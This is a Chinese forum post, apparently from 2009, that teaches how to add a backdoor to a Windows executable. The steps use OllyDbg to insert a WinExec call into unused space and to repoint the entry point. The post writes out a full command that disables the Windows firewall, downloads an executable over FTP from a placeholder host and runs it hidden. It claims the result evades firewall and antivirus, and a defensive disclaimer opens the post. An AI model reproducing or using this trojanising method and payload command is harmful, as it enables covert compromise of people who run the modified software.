|
|
教程的主要目的是教会大家技术,用学到的知识来防御别人的破坏! 切莫用于非法、不正当用途。
教程用到工具:Od
主要过程:在程序的空区域加入汇编代码,也就是利用WinExec这个函数执行运行命令,然后利用ftp系统命令下载自己的后门程序并运行。
运行命令:
c:\windows\system32\cmd.exe /c net stop sharedaccess&echo open www.xxx.cn > t.t&echo ftp用户名>>t.t&echo ftp密码>>t.t&echo cd ftp目录名>>t.t&echo get 测试.exe d:\测试.exe >> t.t&echo bye >> t.t&ftp -s:t.t&del t.t&d:\测试.exe
主要过程就是首先利用net stop sharedaccess关闭系统自带的防火墙,然后利用了ftp命令执行下载并运行
的程序。 大家将运行命令改成自己的就可以,然后看我操作吧。Ok,然后就开始操作吧,给桌面的那个exe文件加后门,用od载入!首先找空区域,然后加入汇编代码,再跳回原来的入口点。最后将程序的入口点改成新的。
原入口:40***28 新的入口地址:401f3b 我这里主要就是利用了winexec这个函数 push 0和push 401cdf就是winexec的两个参数,前面的push 0代表隐藏运行,后面的ppush 401cdf就是刚才的那一串dos命令,我们主要就是利用了winexec执行了dos命令! 现在保存,现在改入口点为新的地址。
这样就完毕了,现在测试一下吧。非常成功的加了后门,而且过防火墙,不被杀软拦截!
如何手工给软件加后门--安全中国anqn.com.rar
(3.34 MB, 下载次数: 193)
|
|
发表于 2009-8-11 11:02:10